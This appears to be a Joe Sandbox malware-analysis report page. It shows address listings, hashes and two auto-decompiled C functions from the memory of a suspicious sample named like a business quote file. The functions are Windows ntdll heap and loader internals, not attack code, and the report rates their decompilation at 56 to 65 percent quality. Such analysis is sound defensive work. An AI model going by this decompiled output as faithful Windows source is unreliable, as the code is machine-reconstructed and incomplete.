                                                                                                                                                                                  0x333b2378
                                                                                                                                                                                  0x333b2381
                                                                                                                                                                                  0x333b2458
                                                                                                                                                                                  0x333b2458
                                                                                                                                                                                  0x333b245b
                                                                                                                                                                                  0x333b2463
                                                                                                                                                                                  0x333b2468
                                                                                                                                                                                  0x333b246e
                                                                                                                                                                                  0x333b246e
                                                                                                                                                                                  0x333b24a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b24a7
                                                                                                                                                                                  0x333b238f
                                                                                                                                                                                  0x333b2396
                                                                                                                                                                                  0x333b239c
                                                                                                                                                                                  0x333b239f
                                                                                                                                                                                  0x333b239f
                                                                                                                                                                                  0x333b23bb
                                                                                                                                                                                  0x333b23c8
                                                                                                                                                                                  0x333b23ca
                                                                                                                                                                                  0x333b23d2
                                                                                                                                                                                  0x333b244c
                                                                                                                                                                                  0x333b244c
                                                                                                                                                                                  0x333b2453
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b23d4
                                                                                                                                                                                  0x333b23e7
                                                                                                                                                                                  0x333b23e9
                                                                                                                                                                                  0x333b23f1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b23f9
                                                                                                                                                                                  0x333b2402
                                                                                                                                                                                  0x333b2408
                                                                                                                                                                                  0x333b240c
                                                                                                                                                                                  0x333b2413
                                                                                                                                                                                  0x333b2423
                                                                                                                                                                                  0x333b243f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2441
                                                                                                                                                                                  0x333b2446
                                                                                                                                                                                  0x333b2446
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2446
                                                                                                                                                                                  0x333b23fb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b23fb
                                                                                                                                                                                  0x333b23d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2372
                                                                                                                                                                                  0x333591be
                                                                                                                                                                                  0x33359118
                                                                                                                                                                                  0x333590fd
                                                                                                                                                                                  0x33359102
                                                                                                                                                                                  0x3335910e

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 3446177414-1194432280
                                                                                                                                                                                  • Opcode ID: 2d465e42ae4153baca23f722f2f898ba2e041ce3de75825d5920c9bc17d2e2a8
                                                                                                                                                                                  • Instruction ID: e868ead85900a7ae527efd0f88b848e5c5bec638848f4886438e09c469d2ccd5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d465e42ae4153baca23f722f2f898ba2e041ce3de75825d5920c9bc17d2e2a8
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9812C72D002699BEB21CF54CC84BDEB7B8AF48750F0085EAA919F7650D7749E85CFA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                                  			E3334F8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x3344b370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x33446960 - 2;
					if( *0x33446960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E3334B910();
						} else {
							E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E3334B910();
						__eflags =  *0x33445da8;
						if(__eflags == 0) {
							_t139 = 2;
							L3340FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E33394B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E333F78DE(_t141, _t161, 0, 8, 0);
					}
					L3334FD8E(_t161, _t158);
					E334102EC(_t161);
					_t158 = 1;
					E3334918A(_t161, 1, 0, 0);
					E33418E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x33443758; // 0x0
					 *0x334491e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E333F78DE(_t147, _t161, 0, 8, 0);
				}
				L3334FD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E333FF85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E3335FED0(0x33444800);
						E3334FAEC(_t161);
						_push(0x33444800);
						E3335E740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E3334FABA( &_v92,  &_v96, 0x8000);
							_t91 = L33363C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E3340DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E3334FABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E3334FABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E3334FA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = L33363C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = L33363C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E33392F90();
								}
							}
							_t107 = L33363C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = L33363C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E33392F90();
							}
							if(L33363C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E3340D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}


















































                                                                                                                                                                                  0x3334f8b0
                                                                                                                                                                                  0x3334f8b8
                                                                                                                                                                                  0x3334f8c2
                                                                                                                                                                                  0x3334f8c6
                                                                                                                                                                                  0x3334f8c9
                                                                                                                                                                                  0x3334f8ce
                                                                                                                                                                                  0x333ae467
                                                                                                                                                                                  0x333ae46e
                                                                                                                                                                                  0x333ae474
                                                                                                                                                                                  0x333ae47a
                                                                                                                                                                                  0x333ae47e
                                                                                                                                                                                  0x333ae49d
                                                                                                                                                                                  0x333ae4a2
                                                                                                                                                                                  0x333ae480
                                                                                                                                                                                  0x333ae495
                                                                                                                                                                                  0x333ae49a
                                                                                                                                                                                  0x333ae4a8
                                                                                                                                                                                  0x333ae4ad
                                                                                                                                                                                  0x333ae4b2
                                                                                                                                                                                  0x333ae4ba
                                                                                                                                                                                  0x333ae4c2
                                                                                                                                                                                  0x333ae4c3
                                                                                                                                                                                  0x333ae4c3
                                                                                                                                                                                  0x333ae4ba
                                                                                                                                                                                  0x3334f9f6
                                                                                                                                                                                  0x3334f9f6
                                                                                                                                                                                  0x3334f9f8
                                                                                                                                                                                  0x3334f9fc
                                                                                                                                                                                  0x3334f9fd
                                                                                                                                                                                  0x3334f9fe
                                                                                                                                                                                  0x3334fa09
                                                                                                                                                                                  0x3334fa09
                                                                                                                                                                                  0x3334f8db
                                                                                                                                                                                  0x333ae4cd
                                                                                                                                                                                  0x333ae4d3
                                                                                                                                                                                  0x333ae4d6
                                                                                                                                                                                  0x3334fa37
                                                                                                                                                                                  0x3334fa37
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334fa37
                                                                                                                                                                                  0x333ae4dc
                                                                                                                                                                                  0x333ae4e1
                                                                                                                                                                                  0x333ae4e3
                                                                                                                                                                                  0x333ae4e9
                                                                                                                                                                                  0x333ae4eb
                                                                                                                                                                                  0x333ae4eb
                                                                                                                                                                                  0x333ae4f2
                                                                                                                                                                                  0x333ae4f9
                                                                                                                                                                                  0x333ae504
                                                                                                                                                                                  0x333ae505
                                                                                                                                                                                  0x333ae50c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae50c
                                                                                                                                                                                  0x3334f8e8
                                                                                                                                                                                  0x333ae516
                                                                                                                                                                                  0x333ae51f
                                                                                                                                                                                  0x333ae525
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae525
                                                                                                                                                                                  0x3334f8ee
                                                                                                                                                                                  0x3334f8ee
                                                                                                                                                                                  0x3334f8f5
                                                                                                                                                                                  0x333ae530
                                                                                                                                                                                  0x333ae532
                                                                                                                                                                                  0x333ae532
                                                                                                                                                                                  0x3334f8fd
                                                                                                                                                                                  0x3334f909
                                                                                                                                                                                  0x333ae53c
                                                                                                                                                                                  0x333ae543
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae54b
                                                                                                                                                                                  0x333ae550
                                                                                                                                                                                  0x333ae552
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f90f
                                                                                                                                                                                  0x3334f90f
                                                                                                                                                                                  0x3334f918
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f91e
                                                                                                                                                                                  0x3334f924
                                                                                                                                                                                  0x3334f92b
                                                                                                                                                                                  0x3334f930
                                                                                                                                                                                  0x3334f931
                                                                                                                                                                                  0x3334f936
                                                                                                                                                                                  0x3334f93c
                                                                                                                                                                                  0x3334f93e
                                                                                                                                                                                  0x333ae55d
                                                                                                                                                                                  0x333ae55f
                                                                                                                                                                                  0x333ae563
                                                                                                                                                                                  0x333ae56a
                                                                                                                                                                                  0x333ae578
                                                                                                                                                                                  0x333ae57c
                                                                                                                                                                                  0x333ae581
                                                                                                                                                                                  0x333ae586
                                                                                                                                                                                  0x333ae588
                                                                                                                                                                                  0x333ae59a
                                                                                                                                                                                  0x333ae58a
                                                                                                                                                                                  0x333ae593
                                                                                                                                                                                  0x333ae593
                                                                                                                                                                                  0x333ae59f
                                                                                                                                                                                  0x333ae5a2
                                                                                                                                                                                  0x333ae5a8
                                                                                                                                                                                  0x333ae5ae
                                                                                                                                                                                  0x333ae5ae
                                                                                                                                                                                  0x333ae5b3
                                                                                                                                                                                  0x333ae5b3
                                                                                                                                                                                  0x3334f94d
                                                                                                                                                                                  0x3334fa0c
                                                                                                                                                                                  0x3334f953
                                                                                                                                                                                  0x3334f953
                                                                                                                                                                                  0x3334f953
                                                                                                                                                                                  0x3334f957
                                                                                                                                                                                  0x3334fa17
                                                                                                                                                                                  0x3334fa1b
                                                                                                                                                                                  0x3334fa28
                                                                                                                                                                                  0x3334fa2d
                                                                                                                                                                                  0x3334fa2d
                                                                                                                                                                                  0x3334f95d
                                                                                                                                                                                  0x3334f965
                                                                                                                                                                                  0x333ae5c7
                                                                                                                                                                                  0x333ae5cc
                                                                                                                                                                                  0x333ae5ce
                                                                                                                                                                                  0x333ae5d3
                                                                                                                                                                                  0x333ae5d3
                                                                                                                                                                                  0x3334f96f
                                                                                                                                                                                  0x3334f981
                                                                                                                                                                                  0x3334f981
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f987
                                                                                                                                                                                  0x3334f98d
                                                                                                                                                                                  0x3334f992
                                                                                                                                                                                  0x3334f999
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f99b
                                                                                                                                                                                  0x3334f99b
                                                                                                                                                                                  0x3334f9a0
                                                                                                                                                                                  0x3334f9ac
                                                                                                                                                                                  0x333ae5e3
                                                                                                                                                                                  0x3334f9b2
                                                                                                                                                                                  0x3334f9b2
                                                                                                                                                                                  0x3334f9b2
                                                                                                                                                                                  0x3334f9b7
                                                                                                                                                                                  0x333ae5ea
                                                                                                                                                                                  0x333ae5f0
                                                                                                                                                                                  0x333ae5f7
                                                                                                                                                                                  0x333ae5fd
                                                                                                                                                                                  0x333ae602
                                                                                                                                                                                  0x333ae604
                                                                                                                                                                                  0x333ae60f
                                                                                                                                                                                  0x333ae60f
                                                                                                                                                                                  0x333ae60f
                                                                                                                                                                                  0x333ae618
                                                                                                                                                                                  0x333ae621
                                                                                                                                                                                  0x333ae622
                                                                                                                                                                                  0x333ae624
                                                                                                                                                                                  0x333ae62c
                                                                                                                                                                                  0x333ae62d
                                                                                                                                                                                  0x333ae631
                                                                                                                                                                                  0x333ae631
                                                                                                                                                                                  0x333ae5f7
                                                                                                                                                                                  0x3334f9bd
                                                                                                                                                                                  0x3334f9c2
                                                                                                                                                                                  0x3334f9ce
                                                                                                                                                                                  0x333ae644
                                                                                                                                                                                  0x3334f9d4
                                                                                                                                                                                  0x3334f9d4
                                                                                                                                                                                  0x3334f9d4
                                                                                                                                                                                  0x3334f9d9
                                                                                                                                                                                  0x333ae64b
                                                                                                                                                                                  0x333ae650
                                                                                                                                                                                  0x333ae652
                                                                                                                                                                                  0x333ae65d
                                                                                                                                                                                  0x333ae65d
                                                                                                                                                                                  0x333ae65d
                                                                                                                                                                                  0x333ae666
                                                                                                                                                                                  0x333ae66f
                                                                                                                                                                                  0x333ae670
                                                                                                                                                                                  0x333ae672
                                                                                                                                                                                  0x333ae67a
                                                                                                                                                                                  0x333ae67b
                                                                                                                                                                                  0x333ae67f
                                                                                                                                                                                  0x333ae67f
                                                                                                                                                                                  0x3334f9e6
                                                                                                                                                                                  0x333ae692
                                                                                                                                                                                  0x3334f9ec
                                                                                                                                                                                  0x3334f9ec
                                                                                                                                                                                  0x3334f9ec
                                                                                                                                                                                  0x3334f9f4
                                                                                                                                                                                  0x3334fa3d
                                                                                                                                                                                  0x3334fa3d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f9f4
                                                                                                                                                                                  0x3334f999
                                                                                                                                                                                  0x3334f918

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 3446177414-3610490719
                                                                                                                                                                                  • Opcode ID: 42338f7adac25e2f1f5960332a562229a327f5ca315248c6759ab603cf423d49
                                                                                                                                                                                  • Instruction ID: 22a19a0cbd46b5f09b0b399d3e55e1b3fb0d5391bf3961f23ff8eadef90ff9a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 42338f7adac25e2f1f5960332a562229a327f5ca315248c6759ab603cf423d49
                                                                                                                                                                                  • Instruction Fuzzy Hash: 87910675F45741AFE315CF28C880B2AB7E9FF44A40F08C659E9819B691DB34E841CBA2
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33370AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                                  			E33370AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x334468d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x334465f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E33387550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E3335FED0(0x334432d8);
					if( *0x334465f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x33449218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x334432d8);
						E3335E740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = L33346DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E333598DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x334465f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x334491e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(L33371C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x334468d8;
									if( *0x334468d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x33445d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = L33365D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x334468d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E333988C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x334468d8 = _v24;
											 *0x33445d4c = _v28;
											goto L9;
										}
										_t89 =  *0x33445d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E333988C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E333988C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x334468d8);
										goto L39;
									} else {
										_t101 =  *0x334437c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E333CE692();
											_t101 =  *0x334437c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							L33370C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E3336DF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}











































                                                                                                                                                                                  0x33370af6
                                                                                                                                                                                  0x33370af8
                                                                                                                                                                                  0x33370afa
                                                                                                                                                                                  0x33370afd
                                                                                                                                                                                  0x33370b00
                                                                                                                                                                                  0x33370b06
                                                                                                                                                                                  0x333b9ea5
                                                                                                                                                                                  0x333b9ea5
                                                                                                                                                                                  0x33370b13
                                                                                                                                                                                  0x33370bd3
                                                                                                                                                                                  0x33370be3
                                                                                                                                                                                  0x33370be3
                                                                                                                                                                                  0x33370be5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33370bd8
                                                                                                                                                                                  0x33370bdb
                                                                                                                                                                                  0x33370be0
                                                                                                                                                                                  0x33370be0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33370b19
                                                                                                                                                                                  0x33370b19
                                                                                                                                                                                  0x33370b27
                                                                                                                                                                                  0x33370b2a
                                                                                                                                                                                  0x33370b36
                                                                                                                                                                                  0x33370c0d
                                                                                                                                                                                  0x33370c15
                                                                                                                                                                                  0x33370c20
                                                                                                                                                                                  0x33370c21
                                                                                                                                                                                  0x33370c23
                                                                                                                                                                                  0x33370c25
                                                                                                                                                                                  0x33370c25
                                                                                                                                                                                  0x33370b3e
                                                                                                                                                                                  0x33370b40
                                                                                                                                                                                  0x33370b43
                                                                                                                                                                                  0x33370b46
                                                                                                                                                                                  0x33370b4b
                                                                                                                                                                                  0x33370bc2
                                                                                                                                                                                  0x33370bc2
                                                                                                                                                                                  0x33370bc7
                                                                                                                                                                                  0x33370bd2
                                                                                                                                                                                  0x33370b4d
                                                                                                                                                                                  0x33370b50
                                                                                                                                                                                  0x33370b56
                                                                                                                                                                                  0x33370b59
                                                                                                                                                                                  0x33370b59
                                                                                                                                                                                  0x33370b5e
                                                                                                                                                                                  0x333b9eb1
                                                                                                                                                                                  0x333b9eb3
                                                                                                                                                                                  0x333b9eb8
                                                                                                                                                                                  0x333b9ebb
                                                                                                                                                                                  0x333b9ebd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9ec3
                                                                                                                                                                                  0x33370b66
                                                                                                                                                                                  0x33370b69
                                                                                                                                                                                  0x33370b70
                                                                                                                                                                                  0x33370bec
                                                                                                                                                                                  0x33370bf3
                                                                                                                                                                                  0x33370bfa
                                                                                                                                                                                  0x33370bfc
                                                                                                                                                                                  0x33370c02
                                                                                                                                                                                  0x33370c04
                                                                                                                                                                                  0x33370c04
                                                                                                                                                                                  0x33370bf3
                                                                                                                                                                                  0x33370b72
                                                                                                                                                                                  0x33370b76
                                                                                                                                                                                  0x33370b78
                                                                                                                                                                                  0x33370b7b
                                                                                                                                                                                  0x33370b7f
                                                                                                                                                                                  0x33370b80
                                                                                                                                                                                  0x33370b8a
                                                                                                                                                                                  0x333b9ec8
                                                                                                                                                                                  0x333b9ecb
                                                                                                                                                                                  0x333b9ecb
                                                                                                                                                                                  0x333b9ece
                                                                                                                                                                                  0x333b9ece
                                                                                                                                                                                  0x333b9ed1
                                                                                                                                                                                  0x333b9ed4
                                                                                                                                                                                  0x333b9ed4
                                                                                                                                                                                  0x333b9edc
                                                                                                                                                                                  0x333b9ede
                                                                                                                                                                                  0x333b9ee5
                                                                                                                                                                                  0x333b9ef1
                                                                                                                                                                                  0x333b9ef1
                                                                                                                                                                                  0x333b9ee7
                                                                                                                                                                                  0x333b9ee7
                                                                                                                                                                                  0x333b9eed
                                                                                                                                                                                  0x333b9eed
                                                                                                                                                                                  0x333b9ef4
                                                                                                                                                                                  0x333b9f0a
                                                                                                                                                                                  0x333b9f0c
                                                                                                                                                                                  0x333b9f0f
                                                                                                                                                                                  0x333b9f11
                                                                                                                                                                                  0x333b9f4e
                                                                                                                                                                                  0x333b9f54
                                                                                                                                                                                  0x333b9f56
                                                                                                                                                                                  0x333b9fbb
                                                                                                                                                                                  0x333b9fbe
                                                                                                                                                                                  0x333b9fc1
                                                                                                                                                                                  0x333b9fc4
                                                                                                                                                                                  0x333b9fc4
                                                                                                                                                                                  0x333b9fc7
                                                                                                                                                                                  0x333b9fca
